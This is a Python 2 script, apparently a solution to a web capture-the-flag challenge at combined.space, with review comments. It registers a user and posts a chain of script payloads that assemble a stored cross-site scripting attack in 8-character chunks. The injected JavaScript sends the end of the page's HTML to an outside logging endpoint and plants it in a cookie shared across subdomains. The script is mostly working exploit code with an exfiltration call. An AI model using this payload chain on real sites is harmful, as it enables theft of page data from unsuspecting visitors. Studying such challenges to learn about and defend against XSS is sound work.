combined.space solution
#!/usr/bin/python
import urllib2
import string
import random
import urllib
import cgi
# Python 2 script (print statement, urllib2, izip_longest further down).
# Build a random 10-letter lowercase registration name from shuffled ASCII letters.
l = list(string.ascii_letters)
random.shuffle(l)
name = "".join(l)[0:10].lower()
# Register the name: urlopen with a data argument issues a POST to the challenge
# root; the whole response body is kept for nonce extraction.
a = urllib2.urlopen("http://combined.space/", "name="+name).read()
# The response is expected to contain "<...>_<nonce>.<...>"; the text between the
# first "_" and the next "." is taken as the per-user nonce.
# NOTE(review): no check that "_" / "." are present -- IndexError if the server
# answers differently (e.g. an error page).
nonce = a.split("_")[1]
nonce = nonce.split(".")[0]
# Per-user subdomain that all later posts go to.
domain = "http://" + name + "_" + nonce + ".combined.space/"
print domain
# Text that ends up as the value of cookie "f" (see the payload loop below).
# The leading "-->" / trailing "<--" are presumably meant to break out of an HTML
# comment on the target page -- confirm; "<--" is not the HTML comment terminator
# ("-->" is), so this may rely on lenient parsing.
# The embedded JavaScript GETs an external endpoint with the last 512 characters
# of document.body.innerHTML, i.e. it sends page content off-origin.  From a
# defender's view this is the impact step of the stored XSS the challenge models:
# user-controlled text presumably reaches the page unencoded -- confirm.
script = "--><script>"
script += "(xhr=new XMLHttpRequest(), console.log(xhr), xhr.open('GET', 'http://allanwirth.com/loge.php?id='+encodeURI(document.body.innerHTML.slice(-512)), true), xhr.send(null))"
script += "</script><--"
# Pad with spaces to a multiple of 8 so the 8-character chunking below never has
# to insert its ";" fill value inside the script text.
if len(script) % 8 != 0:
    script += (8 - len(script) % 8) * " "
# Cookie Domain attribute appended after the padding; appears intended to make
# the cookie visible across *.combined.space subdomains.  Its length (24) is a
# multiple of 8, so the alignment asserted below still holds.
script += "; domain=.combined.space"
print len(script)% 8
assert len(script)%8 == 0
from itertools import izip_longest
def grouper(iterable, n, fillvalue=None):
    """Collect *iterable* into fixed-length tuples of size *n*.

    Standard itertools recipe: one shared iterator is handed to izip_longest
    *n* times, so each output tuple consumes the next *n* items.  The final
    tuple is padded with *fillvalue* when the input length is not a multiple
    of *n*.  Returns a lazy iterator (Python 2 ``izip_longest``).
    """
    shared = iter(iterable)
    return izip_longest(*([shared] * n), fillvalue=fillvalue)
# Each entry is (name, body); both are posted as form fields to the per-user
# subdomain.  The "name" field carries the HTML/JS, "body" is filler text.
# Final order after the insert loop below: clear `a`, append the cookie text
# chunk by chunk, store it as cookie "f", then log `a` and document.cookie.
payloads = [
    ('<script>a="";</script>', "foo"),
    ('<script>document.cookie="f="+a</script>', "foo"),
    ('<script>console.log(a);</script>', 'foo'),
    ('<script>console.log(document.cookie);</script>', 'fuck'),
]
# Split the cookie text into 8-character chunks (padded with ";" only if the
# length is not a multiple of 8 -- excluded by the assertion above).  Chunks are
# walked in reverse and each inserted at index 1, which leaves them in forward
# order right after the a="" initialiser.  An 8-character limit on the stored
# field is presumably what is being worked around -- confirm against the challenge.
for chunk in reversed(list(grouper(script, 8, ";"))):
    # Encode "<" / ">" as JS hex escapes so the literal characters never appear
    # in the stored field (they are restored when the JS string is evaluated).
    # NOTE(review): "\x22" is a *Python* escape that evaluates to a plain '"',
    # so the third replace is a no-op (intent was likely "\\x22"); harmless here
    # because `script` contains no double quotes.
    k = "".join(chunk).replace("<", "\\x3C").replace(">", "\\x3E").replace('"', "\x22")
    payloads.insert(1, ('<script>a+="' + k + '";</script>', "foo"))
# Post every payload in order (form fields URL-encoded with urllib.quote).
# NOTE: the loop variable rebinds the module-level `name` (the random
# registration name) -- harmless only because it is not read again afterwards.
for name,body in payloads:
    urllib2.urlopen(domain, "name="+urllib.quote(name)+"&post="+urllib.quote(body)).read()